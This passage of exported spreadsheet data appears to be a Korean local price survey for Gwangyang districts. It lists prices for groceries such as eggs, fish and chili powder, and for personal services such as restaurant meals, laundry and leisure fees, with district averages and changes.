f":"금호동!H26","v":{"v":1050,"d":"1,050"}}]
[21,"달걀","특란 30개 한판",{"$f":"COUNTIF(J27,\"<>0\")+COUNTIF(M27,\"<>0\")+COUNTIF(P27,\"<>0\")+COUNTIF(S27,\"<>0\")+COUNTIF(V27,\"<>0\")+COUNTIF(Y27,\"<>0\")","v":6},6,{"v":7209.166666666667,"d":"7,209"},{"v":7451.666666666667,"d":"7,452"},{"v":242.5,"d":"243"},{"v":0.033637729742226334,"d":"0"},{"$f":"광양읍1!F27","v":{"v":6610,"d":"6,610"}},{"$f":"광양읍1!G27","v":{"v":6810,"d":"6,810"}},{"$f":"광양읍1!H27","v":200},{"$f":"광양읍2!F27","v":{"v":7850,"d":"7,850"}},{"$f":"광양읍2!G27","v":{"v":7750,"d":"7,750"}},{"$f":"광양읍2!H27","v":-100},{"$f":"중마동1!F27","v":{"v":6195,"d":"6,195"}},{"$f":"중마동1!G27","v":{"v":7545,"d":"7,545"}},{"$f":"중마동1!H27","v":{"v":1350,"d":"1,350"}},{"$f":"중마동2!F27","v":{"v":7600,"d":"7,600"}},{"$f":"중마동2!G27","v":{"v":7875,"d":"7,875"}},{"$f":"중마동2!H27","v":275},{"$f":"광영동!F27","v":{"v":7300,"d":"7,300"}},{"$f":"광영동!G27","v":{"v":7300,"d":"7,300"}},{"$f":"광영동!H27","v":0},{"$f":"금호동!F27","v":{"v":7700,"d":"7,700"}},{"$f":"금호동!G27","v":{"v":7430,"d":"7,430"}},{"$f":"금호동!H27","v":-270}]
[22,"조기","15cm 1마리",6,6,{"v":2004.4166666666667,"d":"2,004"},{"v":1921.0833333333333,"d":"1,921"},{"v":-83.33333333333348,"d":"-83"},{"v":-0.041574855527377115,"d":"-0"},{"$f":"광양읍1!F28","v":{"v":1633,"d":"1,633"}},{"$f":"광양읍1!G28","v":{"v":1633,"d":"1,633"}},{"$f":"광양읍1!H28","v":0},{"$f":"광양읍2!F28","v":{"v":2500,"d":"2,500"}},{"$f":"광양읍2!G28","v":{"v":2500,"d":"2,500"}},{"$f":"광양읍2!H28","v":0},{"$f":"중마동1!F28","v":{"v":2500,"d":"2,500"}},{"$f":"중마동1!G28","v":{"v":1750,"d":"1,750"}},{"$f":"중마동1!H28","v":-750},{"$f":"중마동2!F28","v":{"v":993.5,"d":"994"}},{"$f":"중마동2!G28","v":{"v":1243.5,"d":"1,244"}},{"$f":"중마동2!H28","v":250},{"$f":"광영동!F28","v":{"v":3000,"d":"3,000"}},{"$f":"광영동!G28","v":{"v":3000,"d":"3,000"}},{"$f":"광영동!H28","v":0},{"$f":"금호동!F28","v":{"v":1400,"d":"1,400"}},{"$f":"금호동!G28","v":{"v":1400,"d":"1,400"}},{"$f":"금호동!H28","v":0}]
[23,"갈치","60cm 1마리",6,6,{"v":10055.5,"d":"10,056"},{"v":10043,"d":"10,043"},{"$f":"SUM(G29-F29)","v":{"v":-12.5,"d":"-13"}},{"v":-0.001243100790612103,"d":"-0"},{"$f":"광양읍1!F29","v":{"v":10150,"d":"10,150"}},{"$f":"광양읍1!G29","v":{"v":9400,"d":"9,400"}},{"$f":"광양읍1!H29","v":-750},{"$f":"광양읍2!F29","v":{"v":11500,"d":"11,500"}},{"$f":"광양읍2!G29","v":{"v":11500,"d":"11,500"}},{"$f":"광양읍2!H29","v":0},{"$f":"중마동1!F29","v":{"v":5900,"d":"5,900"}},{"$f":"중마동1!G29","v":{"v":4550,"d":"4,550"}},{"$f":"중마동1!H29","v":{"v":-1350,"d":"-1,350"}},{"$f":"중마동2!F29","v":{"v":15250,"d":"15,250"}},{"$f":"중마동2!G29","v":{"v":17750,"d":"17,750"}},{"$f":"중마동2!H29","v":{"v":2500,"d":"2,500"}},{"$f":"광영동!F29","v":{"v":5950,"d":"5,950"}},{"$f":"광영동!G29","v":{"v":5475,"d":"5,475"}},{"$f":"광영동!H29","v":-475},{"$f":"금호동!F29","v":{"v":11583,"d":"11,583"}},{"$f":"금호동!G29","v":{"v":11583,"d":"11,583"}},{"$f":"금호동!H29","v":0}]
[24,"명태","40cm 1마리",6,6,{"v":4383.333333333333,"d":"4,383"},{"$f":"IF(E30=0,0,SUM(K30,N30,Q30,T30,W30,Z30)/E30)","v":{"v":4383.333333333333,"d":"4,383"}},{"$f":"SUM(G30-F30)","v":0},{"$f":"IF(F30=0,0,((G30-F30)/F30))","v":0},{"$f":"광양읍1!F30","v":{"v":3800,"d":"3,800"}},{"$f":"광양읍1!G30","v":{"v":3800,"d":"3,800"}},{"$f":"광양읍1!H30","v":0},{"$f":"광양읍2!F30","v":{"v":4200,"d":"4,200"}},{"$f":"광양읍2!G30","v":{"v":4200,"d":"4,200"}},{"$f":"광양읍2!H30","v":0},{"$f":"중마동1!F30","v":{"v":4000,"d":"4,000"}},{"$f":"중마동1!G30","v":{"v":4000,"d":"4,000"}},{"$f":"중마동1!H30","v":0},{"$f":"중마동2!F30","v":{"v":4450,"d":"4,450"}},{"$f":"중마동2!G30","v":{"v":4450,"d":"4,450"}},{"$f":"중마동2!H30","v":0},{"$f":"광영동!F30","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!G30","v":{"v":3500,"d":"3,500"}},{"$f":"광영동!H30","v":0},{"$f":"금호동!F30","v":{"v":6350,"d":"6,350"}},{"$f":"금호동!G30","v":{"v":6350,"d":"6,350"}},{"$f":"금호동!H30","v":0}]
[25,"고등어","30cm 1마리",6,6,{"v":4721.666666666667,"d":"4,722"},{"v":4591.666666666667,"d":"4,592"},-130,{"v":-0.02753265090010589,"d":"-0"},{"$f":"광양읍1!F31","v":{"v":4800,"d":"4,800"}},{"$f":"광양읍1!G31","v":{"v":4800,"d":"4,800"}},{"$f":"광양읍1!H31","v":0},{"$f":"광양읍2!F31","v":{"v":4350,"d":"4,350"}},{"$f":"광양읍2!G31","v":{"v":4350,"d":"4,350"}},{"$f":"광양읍2!H31","v":0},{"$f":"중마동1!F31","v":{"v":5250,"d":"5,250"}},{"$f":"중마동1!G31","v":{"v":5050,"d":"5,050"}},{"$f":"중마동1!H31","v":-200},{"$f":"중마동2!F31","v":{"v":6400,"d":"6,400"}},{"$f":"중마동2!G31","v":{"v":6400,"d":"6,400"}},{"$f":"중마동2!H31","v":0},{"$f":"광영동!F31","v":{"v":4150,"d":"4,150"}},{"$f":"광영동!G31","v":{"v":3650,"d":"3,650"}},{"$f":"광영동!H31","v":-500},{"$f":"금호동!F31","v":{"v":3380,"d":"3,380"}},{"$f":"금호동!G31","v":{"v":3300,"d":"3,300"}},{"$f":"금호동!H31","v":-80}]
[26,"냉동오징어","30cm 1마리",6,6,{"v":5327.75,"d":"5,328"},{"v":5206.916666666667,"d":"5,207"},{"v":-120.83333333333303,"d":"-121"},{"v":-0.022679993117795134,"d":"-0"},{"$f":"광양읍1!F32","v":{"v":4750,"d":"4,750"}},{"$f":"광양읍1!G32","v":{"v":5000,"d":"5,000"}},{"$f":"광양읍1!H32","v":250},{"$f":"광양읍2!F32","v":{"v":4750,"d":"4,750"}},{"$f":"광양읍2!G32","v":{"v":4750,"d":"4,750"}},{"$f":"광양읍2!H32","v":0},{"$f":"중마동1!F32","v":{"v":5600,"d":"5,600"}},{"$f":"중마동1!G32","v":{"v":5600,"d":"5,600"}},{"$f":"중마동1!H32","v":0},{"$f":"중마동2!F32","v":{"v":6800,"d":"6,800"}},{"$f":"중마동2!G32","v":{"v":6800,"d":"6,800"}},{"$f":"중마동2!H32","v":0},{"$f":"광영동!F32","v":{"v":5700,"d":"5,700"}},{"$f":"광영동!G32","v":{"v":4725,"d":"4,725"}},{"$f":"광영동!H32","v":-975},{"$f":"금호동!F32","v":{"v":4366.5,"d":"4,367"}},{"$f":"금호동!G32","v":{"v":4366.5,"d":"4,367"}},{"$f":"금호동!H32","v":0}]
[27,"콩","상품 1kg",null,{"$f":"COUNTIF(K33,\"<>0\")+COUNTIF(N33,\"<>0\")+COUNTIF(Q33,\"<>0\")+COUNTIF(T33,\"<>0\")+COUNTIF(W33,\"<>0\")+COUNTIF(Z33,\"<>0\")","v":5},0,{"v":9537,"d":"9,537"},{"v":9537,"d":"9,537"},0,{"$f":"광양읍1!F33","v":{"v":10000,"d":"10,000"}},{"$f":"광양읍1!G33","v":{"v":10000,"d":"10,000"}},{"$f":"광양읍1!H33","v":0},{"$f":"광양읍2!F33","v":0},{"$f":"광양읍2!G33","v":0},{"$f":"광양읍2!H33","v":0},{"$f":"중마동1!F33","v":{"v":6030,"d":"6,030"}},{"$f":"중마동1!G33","v":{"v":6030,"d":"6,030"}},{"$f":"중마동1!H33","v":0},{"$f":"중마동2!F33","v":{"v":11900,"d":"11,900"}},{"$f":"중마동2!G33","v":{"v":11900,"d":"11,900"}},{"$f":"중마동2!H33","v":0},{"$f":"광영동!F33","v":{"v":8320,"d":"8,320"}},{"$f":"광영동!G33","v":{"v":8320,"d":"8,320"}},{"$f":"광영동!H33","v":0},{"$f":"금호동!F33","v":{"v":11435,"d":"11,435"}},{"$f":"금호동!G33","v":{"v":11435,"d":"11,435"}},{"$f":"금호동!H33","v":0}]
[28,"고춧가루","상품 3kg",null,5,0,{"v":107186,"d":"107,186"},{"v":107186,"d":"107,186"},0,{"$f":"광양읍1!F34","v":{"v":93900,"d":"93,900"}},{"$f":"광양읍1!G34","v":{"v":93900,"d":"93,900"}},{"$f":"광양읍1!H34","v":0},{"$f":"광양읍2!F34","v":0},{"$f":"광양읍2!G34","v":0},{"$f":"광양읍2!H34","v":0},{"$f":"중마동1!F34","v":{"v":93900,"d":"93,900"}},{"$f":"중마동1!G34","v":{"v":93900,"d":"93,900"}},{"$f":"중마동1!H34","v":0},{"$f":"중마동2!F34","v":{"v":81250,"d":"81,250"}},{"$f":"중마동2!G34","v":{"v":81250,"d":"81,250"}},{"$f":"중마동2!H34","v":0},{"$f":"광영동!F34","v":{"v":91000,"d":"91,000"}},{"$f":"광영동!G34","v":{"v":91000,"d":"91,000"}},{"$f":"광영동!H34","v":0},{"$f":"금호동!F34","v":{"v":175880,"d":"175,880"}},{"$f":"금호동!G34","v":{"v":175880,"d":"175,880"}},{"$f":"금호동!H34","v":0}]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",6,6,{"v":7583.333333333333,"d":"7,583"},{"v":7583.333333333333,"d":"7,583"},0,0,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[2,"냉면","물냉면, 1인분(보통)",6,6,{"v":6708.333333333333,"d":"6,708"},{"v":6708.333333333333,"d":"6,708"},0,0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":5750,"d":"5,750"},{"v":5750,"d":"5,750"},0]
[3,"비빔밥","1인분(보통)",6,6,{"v":5791.666666666667,"d":"5,792"},{"v":5791.666666666667,"d":"5,792"},0,0,{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5250,"d":"5,250"},{"v":5250,"d":"5,250"},0,{"v":5750,"d":"5,750"},{"v":5750,"d":"5,750"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0]
[4,"갈비탕","1인분(보통)",6,6,{"v":8916.666666666666,"d":"8,917"},{"v":8916.666666666666,"d":"8,917"},0,0,{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,{"v":10500,"d":"10,500"},{"v":10500,"d":"10,500"},0,{"v":10500,"d":"10,500"},{"v":10500,"d":"10,500"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[5,"삼계탕","1인분(보통)",6,6,{"v":12916.666666666666,"d":"12,917"},{"v":12916.666666666666,"d":"12,917"},0,0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":12500,"d":"12,500"},{"v":12500,"d":"12,500"},0,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0]
[6,"된장찌개\n백반","1인분(보통)",6,6,{"v":5875,"d":"5,875"},{"v":5875,"d":"5,875"},0,0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5750,"d":"5,750"},{"v":5750,"d":"5,750"},0]
[7,"김치찌개\n백반","1인분(보통)",6,6,{"v":6041.666666666667,"d":"6,042"},{"v":6041.666666666667,"d":"6,042"},0,0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5750,"d":"5,750"},{"v":5750,"d":"5,750"},0]
[8,"불고기","1인분(200g)\n공기밥 제외",6,6,{"v":20147,"d":"20,147"},{"v":20147,"d":"20,147"},0,0,{"v":22222,"d":"22,222"},{"v":22222,"d":"22,222"},0,{"v":26000,"d":"26,000"},{"v":26000,"d":"26,000"},0,{"v":26000,"d":"26,000"},{"v":26000,"d":"26,000"},0,{"v":26660,"d":"26,660"},{"v":26660,"d":"26,660"},0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[9,"등심구이","1인분(200g)\n공기밥 제외",5,5,{"v":31068.9,"d":"31,069"},{"v":31068.9,"d":"31,069"},0,0,{"v":37999.5,"d":"38,000"},{"v":37999.5,"d":"38,000"},0,{"v":28000,"d":"28,000"},{"v":28000,"d":"28,000"},0,{"v":31350,"d":"31,350"},{"v":31350,"d":"31,350"},0,{"v":29995,"d":"29,995"},{"v":29995,"d":"29,995"},0,{"v":28000,"d":"28,000"},{"v":28000,"d":"28,000"},0,0,0,0]
[10,"생선초밥","1인분(보통), 활어기준",4,4,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,0,0,0,0,{"v":12500,"d":"12,500"},{"v":12500,"d":"12,500"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0,0,0,0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[11,"튀김닭","양념통닭 1마리",6,6,{"v":16083.333333333334,"d":"16,083"},{"v":16083.333333333334,"d":"16,083"},0,0,{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0]
[12,"칼국수","1인분(보통)",6,6,{"v":5583.333333333333,"d":"5,583"},{"v":5583.333333333333,"d":"5,583"},0,0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":4750,"d":"4,750"},{"v":4750,"d":"4,750"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":4750,"d":"4,750"},{"v":4750,"d":"4,750"},0]
[13,"조리라면","분식점 1인분",6,6,{"v":2791.6666666666665,"d":"2,792"},{"v":2791.6666666666665,"d":"2,792"},0,0,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},0,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"}]
[14,"김밥","분식점 1인분",6,6,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,0,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,{"v":1750,"d":"1,750"},{"v":1750,"d":"1,750"},0,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,{"v":1750,"d":"1,750"},{"v":1750,"d":"1,750"},0,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[15,"짜장면","1인분(보통)",6,6,{"v":4666.666666666667,"d":"4,667"},{"v":4666.666666666667,"d":"4,667"},0,0,{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0]
[16,"짬뽕","1인분(보통)",6,6,{"v":5833.333333333333,"d":"5,833"},{"v":5833.333333333333,"d":"5,833"},0,0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0]
[17,"탕수육","일반탕수육(보통)",6,6,{"v":16416.666666666668,"d":"16,417"},{"v":16416.666666666668,"d":"16,417"},0,0,{"v":16500,"d":"16,500"},{"v":16500,"d":"16,500"},0,{"v":17500,"d":"17,500"},{"v":17500,"d":"17,500"},0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},0]
[18,"돈가스","일반돈가스,1인분",6,6,{"v":7575,"d":"7,575"},{"v":7575,"d":"7,575"},0,0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,{"v":5950,"d":"5,950"},{"v":5950,"d":"5,950"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[19,"햄버거","기본형(야채,고기)",5,5,{"v":3110,"d":"3,110"},{"v":3110,"d":"3,110"},0,0,{"v":2950,"d":"2,950"},{"v":2950,"d":"2,950"},0,{"v":2900,"d":"2,900"},{"v":2900,"d":"2,900"},0,{"v":3400,"d":"3,400"},{"v":3400,"d":"3,400"},0,{"v":3100,"d":"3,100"},{"v":3100,"d":"3,100"},0,0,0,0,{"v":3200,"d":"3,200"},{"v":3200,"d":"3,200"},0]
[20,"피자","기본형(야채,고기)",5,5,{"v":13370,"d":"13,370"},{"v":13370,"d":"13,370"},0,0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":12400,"d":"12,400"},{"v":12400,"d":"12,400"},0,{"v":16000,"d":"16,000"},{"v":16000,"d":"16,000"},0,{"v":11950,"d":"11,950"},{"v":11950,"d":"11,950"},0,{"v":14500,"d":"14,500"},{"v":14500,"d":"14,500"},0,0,0,0]
[21,"커피(외식)","일반원두커피",6,6,{"v":2916.6666666666665,"d":"2,917"},{"v":2916.6666666666665,"d":"2,917"},0,0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":3150,"d":"3,150"},{"v":3150,"d":"3,150"},0,{"v":3050,"d":"3,050"},{"v":3050,"d":"3,050"},0,{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},0,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,{"v":1750,"d":"1,750"},{"v":1750,"d":"1,750"},0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",6,6,{"v":3633.3333333333335,"d":"3,633"},{"v":3633.3333333333335,"d":"3,633"},0,0,{"v":4400,"d":"4,400"},{"v":4400,"d":"4,400"},0,{"v":4100,"d":"4,100"},{"v":4100,"d":"4,100"},0,{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},0,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[23,"삼겹살","식육식당 200g(국내산)",6,6,{"v":10734.333333333334,"d":"10,734"},{"v":10734.333333333334,"d":"10,734"},0,0,{"v":11111,"d":"11,111"},{"v":11111,"d":"11,111"},0,{"v":10500,"d":"10,500"},{"v":10500,"d":"10,500"},0,{"v":9250,"d":"9,250"},{"v":9250,"d":"9,250"},0,{"v":12545,"d":"12,545"},{"v":12545,"d":"12,545"},0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[24,"돼지갈비","식육식당 200g(국내산)",6,6,{"v":10425.916666666666,"d":"10,426"},{"v":10425.916666666666,"d":"10,426"},0,0,{"v":10555.5,"d":"10,556"},{"v":10555.5,"d":"10,556"},0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0]
[25,"쇠갈비","식육식당 200g(국내산)",2,2,{"v":34225,"d":"34,225"},{"v":34225,"d":"34,225"},0,0,{"v":31450,"d":"31,450"},{"v":31450,"d":"31,450"},0,{"v":37000,"d":"37,000"},{"v":37000,"d":"37,000"},0,0,0,0,0,0,0,0,0,0,0,0,0]
[26,"생맥주","500CC 1잔",6,6,{"v":2958.3333333333335,"d":"2,958"},{"v":2958.3333333333335,"d":"2,958"},0,0,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},0,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,{"v":2750,"d":"2,750"},{"v":2750,"d":"2,750"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",3,3,{"v":16283.333333333334,"d":"16,283"},{"v":16283.333333333334,"d":"16,283"},0,0,{"v":11140,"d":"11,140"},{"v":11140,"d":"11,140"},0,{"v":17710,"d":"17,710"},{"v":17710,"d":"17,710"},0,0,0,0,0,0,0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,0,0,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",6,6,{"v":6250,"d":"6,250"},{"v":6250,"d":"6,250"},0,0,{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",6,6,{"v":3666.6666666666665,"d":"3,667"},{"v":3666.6666666666665,"d":"3,667"},0,0,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",1,1,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",1,1,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",3,3,{"v":2916.6666666666665,"d":"2,917"},{"v":2916.6666666666665,"d":"2,917"},0,0,{"v":1750,"d":"1,750"},{"v":1750,"d":"1,750"},0,0,0,0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,0,0,0,0,0,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",3,3,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0,0,0,0,{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,0,0,0,0,0,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",6,6,{"v":108333.33333333333,"d":"108,333"},{"v":108333.33333333333,"d":"108,333"},0,0,{"v":152500,"d":"152,500"},{"v":152500,"d":"152,500"},0,{"v":77500,"d":"77,500"},{"v":77500,"d":"77,500"},0,{"v":115000,"d":"115,000"},{"v":115000,"d":"115,000"},null,{"v":80000,"d":"80,000"},{"v":80000,"d":"80,000"},0,{"v":135000,"d":"135,000"},{"v":135000,"d":"135,000"},0,{"v":90000,"d":"90,000"},{"v":90000,"d":"90,000"},0]
[35,"노래방\n이용료","일반인 저녁 1시간",6,6,{"v":17833.333333333332,"d":"17,833"},{"v":17833.333333333332,"d":"17,833"},0,0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",6,6,{"v":8891.666666666666,"d":"8,892"},{"v":8891.666666666666,"d":"8,892"},0,0,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,{"v":9050,"d":"9,050"},{"v":9050,"d":"9,050"},0,{"v":10400,"d":"10,400"},{"v":10400,"d":"10,400"},0,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,{"v":8400,"d":"8,400"},{"v":8400,"d":"8,400"},0,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",6,6,{"v":13916.666666666666,"d":"13,917"},{"v":13916.666666666666,"d":"13,917"},0,0,{"v":14500,"d":"14,500"},{"v":14500,"d":"14,500"},0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",6,6,{"v":295.8333333333333,"d":"296"},{"v":295.8333333333333,"d":"296"},0,0,250,250,0,225,225,0,300,300,0,300,300,0,500,500,0,200,200,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",3,3,{"v":1666.6666666666667,"d":"1,667"},{"v":1666.6666666666667,"d":"1,667"},0,0,0,0,0,{"v":1000,"d":"1,000"},{"v":1000,"d":"1,000"},0,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,0,0,0,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,0,0,0]
